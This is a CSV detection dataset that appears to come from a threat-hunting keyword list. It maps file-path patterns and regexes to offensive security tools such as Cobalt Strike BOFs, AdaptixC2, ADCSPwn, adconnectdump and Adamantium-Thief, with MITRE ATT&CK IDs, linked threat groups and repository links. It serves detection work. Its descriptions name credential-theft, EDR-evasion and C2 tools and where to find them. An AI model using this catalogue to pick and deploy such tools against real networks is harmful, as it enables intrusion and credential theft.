"*/acheron.go*",".{0,1000}\/acheron\.go.{0,1000}","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","N/A","4","326","39","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z","5114"
"*/ACLight.git*",".{0,1000}\/ACLight\.git.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","1","N/A","AD Enumeration","7","9","801","146","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z","5115"
"*/ACLight/*",".{0,1000}\/ACLight\/.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","1","N/A","N/A","N/A","9","801","146","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z","5116"
"*/acltoolkit*",".{0,1000}\/acltoolkit.{0,1000}","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/zblurx/acltoolkit","1","1","N/A","N/A","N/A","2","120","12","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z","5117"
"*/acm_enum_cas_*.json*",".{0,1000}\/acm_enum_cas_.{0,1000}\.json.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","#linux","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","5118"
"*/acm_enum_certs_*.json*",".{0,1000}\/acm_enum_certs_.{0,1000}\.json.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","#linux","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","5119"
"*/acm_enum_certs_chain_*.json*",".{0,1000}\/acm_enum_certs_chain_.{0,1000}\.json.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","#linux","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","5120"
"*/acm_enum_certs_expired_*.json*",".{0,1000}\/acm_enum_certs_expired_.{0,1000}\.json.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","#linux","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","5121"
"*/acm_enum_certs_info_*.json*",".{0,1000}\/acm_enum_certs_info_.{0,1000}\.json.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","#linux","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","5122"
"*/ActiveScanPlusPlus*",".{0,1000}\/ActiveScanPlusPlus.{0,1000}","offensive_tool_keyword","ActiveScanPlusPlus","ActiveScan++ extends Burp Suite's active and passive scanning capabilities. Designed to add minimal network overhead. it identifies application behaviour that may be of interest to advanced testers","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/albinowax/ActiveScanPlusPlus","1","1","N/A","network exploitation tool","N/A","7","630","195","2025-04-17T10:47:54Z","2014-06-23T10:04:13Z","5124"
"*/AD_Enumeration_Hunt*",".{0,1000}\/AD_Enumeration_Hunt.{0,1000}","offensive_tool_keyword","AD_Enumeration_Hunt","This repository contains a collection of PowerShell scripts and commands that can be used for Active Directory (AD) penetration testing and security assessment","T1018 - T1003 - T1033 - T1087 - T1069 - T1046 - T1069.002 - T1047 - T1083","TA0001 - TA0007 - TA0005 - TA0002 - TA0003","N/A","N/A","Discovery","https://github.com/alperenugurlu/AD_Enumeration_Hunt","1","1","N/A","AD Enumeration","7","1","93","18","2023-08-05T06:10:26Z","2023-08-05T05:16:57Z","5125"
"*/AD_Miner.git*",".{0,1000}\/AD_Miner\.git.{0,1000}","offensive_tool_keyword","AD_Miner","AD Miner is an Active Directory audit tool that leverages cypher queries to crunch data from the #Bloodhound graph database to uncover security weaknesses","T1087.002 - T1069 - T1018 - T1595","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/Mazars-Tech/AD_Miner","1","1","N/A","AD Enumeration","7","10","1290","131","2025-03-12T10:53:09Z","2023-09-26T12:36:59Z","5126"
"*/ADACLScanner.git*",".{0,1000}\/ADACLScanner\.git.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","1","N/A","AD Enumeration","7","10","1015","173","2025-04-11T14:35:08Z","2017-04-06T12:28:37Z","5129"
"*/adalanche/modules/*",".{0,1000}\/adalanche\/modules\/.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","1","N/A","AD Enumeration","10","10","1908","184","2025-03-25T13:01:45Z","2020-10-07T10:07:22Z","5130"
"*/Adamantium-Thief.git*",".{0,1000}\/Adamantium\-Thief\.git.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","1","N/A","N/A","10","9","818","205","2025-01-12T15:11:50Z","2020-03-01T06:50:15Z","5131"
"*/ADAPE.ps1*",".{0,1000}\/ADAPE\.ps1.{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege Escalation","https://github.com/cjoan75/ADAPE-Script","1","1","N/A","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","5132"
"*/ADAPE-Script.git*",".{0,1000}\/ADAPE\-Script\.git.{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege Escalation","https://github.com/cjoan75/ADAPE-Script","1","1","N/A","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","5133"
"*/AdapticClient.exe*",".{0,1000}\/AdapticClient\.exe.{0,1000}","offensive_tool_keyword","AdaptixC2","C2- Adaptix is an extensible post-exploitation and adversarial emulation framework made for penetration testers","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/Adaptix-Framework/AdaptixC2","1","1","N/A","N/A","10","10","547","114","2025-04-21T06:03:46Z","2024-08-21T18:07:05Z","5134"
"*/adaptiveC2.py*",".{0,1000}\/adaptiveC2\.py.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","5135"
"*/AdaptixC2.git*",".{0,1000}\/AdaptixC2\.git.{0,1000}","offensive_tool_keyword","AdaptixC2","C2- Adaptix is an extensible post-exploitation and adversarial emulation framework made for penetration testers","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/Adaptix-Framework/AdaptixC2","1","1","N/A","N/A","10","10","547","114","2025-04-21T06:03:46Z","2024-08-21T18:07:05Z","5136"
"*/adaudit.git*",".{0,1000}\/adaudit\.git.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","5137"
"*/ADAudit.ps1*",".{0,1000}\/ADAudit\.ps1.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","5139"
"*/ADcheck.git*",".{0,1000}\/ADcheck\.git.{0,1000}","offensive_tool_keyword","Adcheck","Assess the security of your Active Directory with few or all privileges. This tool offers functionalities similar to PingCastle","T1087 - T1012 - T1482 - T1059 - T1203 - T1212 - T1480 - T1552 - T1112 - T1207 - T1483 - T1113 - T1057 - T1136 - T1119 - T1082 - T1553 - T1140 - T1107 - T1078 - T1562","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/CobblePot59/Adcheck","1","1","N/A","N/A","10","4","315","35","2025-04-18T15:17:46Z","2024-05-10T13:54:45Z","5141"
"*/ADcheck.py*",".{0,1000}\/ADcheck\.py.{0,1000}","offensive_tool_keyword","Adcheck","Assess the security of your Active Directory with few or all privileges. This tool offers functionalities similar to PingCastle","T1087 - T1012 - T1482 - T1059 - T1203 - T1212 - T1480 - T1552 - T1112 - T1207 - T1483 - T1113 - T1057 - T1136 - T1119 - T1082 - T1553 - T1140 - T1107 - T1078 - T1562","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/CobblePot59/Adcheck","1","1","N/A","N/A","10","4","315","35","2025-04-18T15:17:46Z","2024-05-10T13:54:45Z","5142"
"*/ADCollector.exe*",".{0,1000}\/ADCollector\.exe.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","1","N/A","N/A","7","7","629","81","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z","5143"
"*/ADCollector.exe*",".{0,1000}\/ADCollector\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","5144"
"*/ADCollector.exe*",".{0,1000}\/ADCollector\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","5145"
"*/ADCollector.git*",".{0,1000}\/ADCollector\.git.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","1","N/A","N/A","7","7","629","81","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z","5146"
"*/adconnectdump.git*",".{0,1000}\/adconnectdump\.git.{0,1000}","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","N/A","10","7","668","88","2024-11-10T22:00:16Z","2019-04-09T07:41:42Z","5148"
"*/ADCS.ps1*",".{0,1000}\/ADCS\.ps1.{0,1000}","offensive_tool_keyword","PoshADCS","attack vectors against Active Directory by abusing Active Directory Certificate Services (ADCS)","T1213.003 - T1213 - T1098.003 - T1098 - T1484.001","TA0002 - TA0003 - TA0040","N/A","N/A","Persistence","https://github.com/cfalta/PoshADCS","1","1","N/A","N/A","7","2","186","17","2021-07-07T16:47:07Z","2019-10-15T15:54:03Z","5149"
"*/adcs.py*",".{0,1000}\/adcs\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#linux","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","5150"
"*/adcs_enum/*",".{0,1000}\/adcs_enum\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","N/A","10","10","1389","234","2025-03-26T19:36:31Z","2020-07-15T16:21:18Z","5151"
"*/adcs_request/adcs_request.*",".{0,1000}\/adcs_request\/adcs_request\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","5152"
"*/adcs_request/CertCli.*",".{0,1000}\/adcs_request\/CertCli\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","5153"
"*/adcs_request/certenroll.*",".{0,1000}\/adcs_request\/certenroll\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","5154"
"*/adcs_request/CertPol.*",".{0,1000}\/adcs_request\/CertPol\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","5155"
"*/ADCSCoercePotato.git*",".{0,1000}\/ADCSCoercePotato\.git.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","1","N/A","N/A","10","3","224","31","2024-05-05T14:42:23Z","2024-02-26T12:08:34Z","5156"
"*/ADCSCoercePotato/*",".{0,1000}\/ADCSCoercePotato\/.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","1","N/A","N/A","10","3","224","31","2024-05-05T14:42:23Z","2024-02-26T12:08:34Z","5157"
"*/adcs-enum.py*",".{0,1000}\/adcs\-enum\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","5158"
"*/adcshunter.git*",".{0,1000}\/adcshunter\.git.{0,1000}","offensive_tool_keyword","adcshunter","Uses rpcdump to locate the ADCS server and identify if ESC8 is vulnerable from unauthenticated perspective.","T1018 - T1087 - T1046 - T1201 - T1595","TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/danti1988/adcshunter","1","1","N/A","N/A","7","1","80","7","2024-09-13T12:50:50Z","2023-12-14T14:31:05Z","5159"
"*/ADCSKiller*",".{0,1000}\/ADCSKiller.{0,1000}","offensive_tool_keyword","ADCSKiller","ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure","T1552.004 - T1003.003 - T1114.002 - T1649","TA0006 - TA0003 - TA0005","N/A","N/A","Exploitation tool","https://github.com/grimlockx/ADCSKiller","1","1","N/A","N/A","N/A","8","710","70","2023-05-19T17:36:37Z","2023-05-19T06:51:41Z","5160"
"*/ADCSPwn.exe*",".{0,1000}\/ADCSPwn\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","5161"
"*/ADCSPwn.exe*",".{0,1000}\/ADCSPwn\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","5162"
"*/ADCSPwn.git*",".{0,1000}\/ADCSPwn\.git.{0,1000}","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003 - T1649","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","1","N/A","N/A","10","9","838","127","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z","5163"
"*/adcsync.git*",".{0,1000}\/adcsync\.git.{0,1000}","offensive_tool_keyword","adcsync","Use ESC1 to perform a makeshift DCSync and dump hashes","T1003.006 - T1021","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/JPG0mez/ADCSync","1","1","N/A","N/A","9","3","205","22","2023-11-02T21:41:08Z","2023-10-04T01:56:50Z","5164"
"*/adcsync.py*",".{0,1000}\/adcsync\.py.{0,1000}","offensive_tool_keyword","adcsync","Use ESC1 to perform a makeshift DCSync and dump hashes","T1003.006 - T1021","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/JPG0mez/ADCSync","1","1","N/A","N/A","9","3","205","22","2023-11-02T21:41:08Z","2023-10-04T01:56:50Z","5165"
